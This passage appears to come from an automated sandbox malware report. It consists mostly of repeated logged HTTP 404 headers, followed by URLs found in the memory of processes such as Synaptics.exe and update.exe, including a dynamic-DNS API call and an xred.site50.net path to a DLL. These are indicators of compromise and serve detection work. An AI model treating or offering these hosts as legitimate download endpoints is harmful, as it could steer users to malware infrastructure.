                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5R9-y2K9Uc1YS28zKzMIjlr5Lsk_SnmicSaIKNBWItdEzvlSkHylIzxn0DZlD-UGVdContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:07:36 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-WWK9c0otsDCsIZGODaTMgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=ES8n9cVyCUaunsy6BkYMzsBr24OjOb2KaLrMudzmiicf0zrQxE7a90KFSHonEK3bSfV4GkrhxYVtjQGHgZpQD4LoCKwcaYfpmdNTbAY0-4dqash3ELo436BN2GnWNTjm6pHSD-Mlclev7P-9DqeLvx7P6YWB2_TZmM2MFJL-yCfjy7fWQQmGVhc; expires=Thu, 26-Jun-2025 08:07:36 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4tfXR_jvBnoOmFWo_EU3txcxA31dCHxmsa1rvlDiKUk8nfIji9ctnaujoLm4XQ9GiJfsnXZGoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:07:36 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-hsfk9xJEsLeQ7fTnu1KYYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY; expires=Thu, 26-Jun-2025 08:07:36 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4-gXrvpnS_x0sRkk5UjghrjASPgjZtMq48-Ign2VLt4zFndu5UpCUbYvo9vIyGx2vqawHggZoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:07:42 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-2tdIgcJMty6xbvmB5N4kfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5tWkbpQQfrWHUB1qF2whu5JOzeaVIYdglggN0xXM8cFaz--Cqbmg_Z7rVJ6lfhQN_ro7ePPwAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:07:42 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-AMTLmBSgpgtiXi7zY_-KAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6VFTziZmc-1Z9kBqSWv_iZRoUwfntOVECXnYRqZcaaQedZZ5fzbLyhLvQrksSI9kH0ncQcBXQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:07 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tBPJd58qmnQfLVz_k7xn_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC461AqJeNU0bsxLJDj9Nt4gB8pTcDSJfwIG2raq8eQslZnfZq6Mgdj1JHidaBxjrhSlContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:07 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Ys2MXjkiSQMH0IbFyxPaDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6-UI5mK88lRPswtx-fAsCMQDiZRMSZYgSXkbXmSt71T4zF7kGkEfawWMf2ltJgCP5AContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:13 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-Jou4T4o0EML-4h0QGELL6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ATCLUljMnGFjPbXP4pv-C9g3erijnJgFueJ6Y4jdIzA1xrgpTZX60x8FZQcGfabXNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:13 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-59cUY-mts2pNKvXhSvNqeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC46zEPSxOXnJtWRuxBmoPvCgz0JpN_GrTo3Gi877QCbuy14KGjfx15jolvfv1M3Ecmu1BCtmzYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:23 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-qQeMKvbM7tZEbPylnYa-ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4_VHd_DHUS-yvVglPwMuVHfMUwJxmocH_T_G-zVvfG3_xIUFRAIxrGCQZ1etoasOhxContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:23 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-_bfRP3NYFEcC_-4xr6hsDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5G0AM4hUSJeI6h3e2L7oWK-D2wJcZ-3KJu4sjfmC5ol39mQ4N3dgPQjsP0uQdfLNOJ94Zog5kContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:29 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-fiO4YhprWCb9ItcHu0vU8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7OgGrtJyLz_nvUtQ3y97wxkGnIvqplsCqMB_BI57gpw1MPEq-rDhLhsw18LbPGhyikContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:31 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-bP9JUtOrZbkyrIFlxoeDgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6u-0oQpt31XDUPCt26kfr5onLFzZWnLLjXeHFmgGub9Lqr0kjLHmEL43DnK7FnA4bBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:32 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4KbNiu16GpxBN4soZuVXWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5yLLd63mTyymk8cynW1LXLsb9yDn2Dc5Nfeln7d87xFpjosoPUVcws31na8XjG1abvContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:50 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EvRgHQ2sVqNNQgM9jmFWhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC41UYyn26Lm1ZDVFJp-pOcvAy7sTxN0DW3XWyJQWVFCXduairEXYKECj7j5Rcl2atpCbozCrr0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:50 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-gYiaHXXfDRklIN--AgVPYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6kNIlWYuOmH-ZCoFzgG9Nfq3M8yaCOsl9KxyRziScypP-sdgJZA_pO8QWG2r5eebemE09wKuoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:56 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SxSJcccvBBdaMxUzMPw-fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6k15TExYxAAz5b6FPdRy3MLZSvIkscNz90wl_eCY6vjUNifMflN6K4jOEL6w-fY8GcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:08:56 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-jCw2YMIf9q4Mv9tI9t0CrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Rk2pdi18vxEe0YfmVS3C9l96fONp5K9IwkWu-PRmFYhA_8wmelTCadjo72y0EEIjMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:09:01 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-2orpwxhy03kheJwZTXAD2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4qsokhAxUkHlHRW54fOnLCDU9cH1M5IvcQmpLO5t9vIGR21KNIfccPZeEOOBwmJ3Y3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 25 Dec 2024 08:09:02 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Agg0YvNVdaWnwZtvlcVOnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: Synaptics.exe, 00000008.00000002.2965600161.0000000002330000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, RCX4F1F.tmp.6.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                Source: ._cache_update.exe, 00000007.00000002.2964576754.0000000000DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/O6
                                Source: update.exe, 00000006.00000003.1877214900.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
